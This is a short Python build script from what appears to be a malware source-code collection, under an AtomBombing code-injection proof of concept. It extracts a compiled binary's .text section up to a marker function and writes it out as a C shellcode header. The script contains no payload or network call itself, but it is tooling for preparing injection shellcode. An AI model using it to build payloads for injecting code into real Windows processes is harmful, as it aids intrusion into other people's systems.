MalwareSourceCode/Win32/Proof of Concepts/AtomBombingInjection/AtomBombingShellcode/Scripts/Post_Link.py

31 lines
1.0 KiB
Python
Raw Normal View History

2022-04-12 01:00:13 +00:00
import pefile
import sys
import os
DUMMY_FUNC = "\x55\x8b\xec\x51\xc7\x45\xfc\xbe\xba\xad\xde\x8b\xe5\x5d\xc3"
def main():
exe_path = sys.argv[1]
pe = pefile.PE(exe_path)
print "Starting!"
output = ""
text_section = ""
for section in pe.sections:
if ".text" in section.Name:
print (section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), section.SizeOfRawData )
text_section = pe.get_data(section.VirtualAddress, section.SizeOfRawData)
binary_shellcode = text_section[:text_section.find(DUMMY_FUNC)]
for byte in binary_shellcode:
output += "\\x%x" % ord(byte)
output = "#define SHELLCODE (\"%s\")" % output
folder, file_name = os.path.split(exe_path)
base, _ = os.path.splitext(file_name)
print os.path.join(folder, base+".h")
open(os.path.join(folder, base) + ".h", "wb").write(output)
open(os.path.join(folder, base) + ".text", "wb").write(text_section)
open(os.path.join(folder, base) + ".shellcode", "wb").write(binary_shellcode)
if __name__ == "__main__":
main()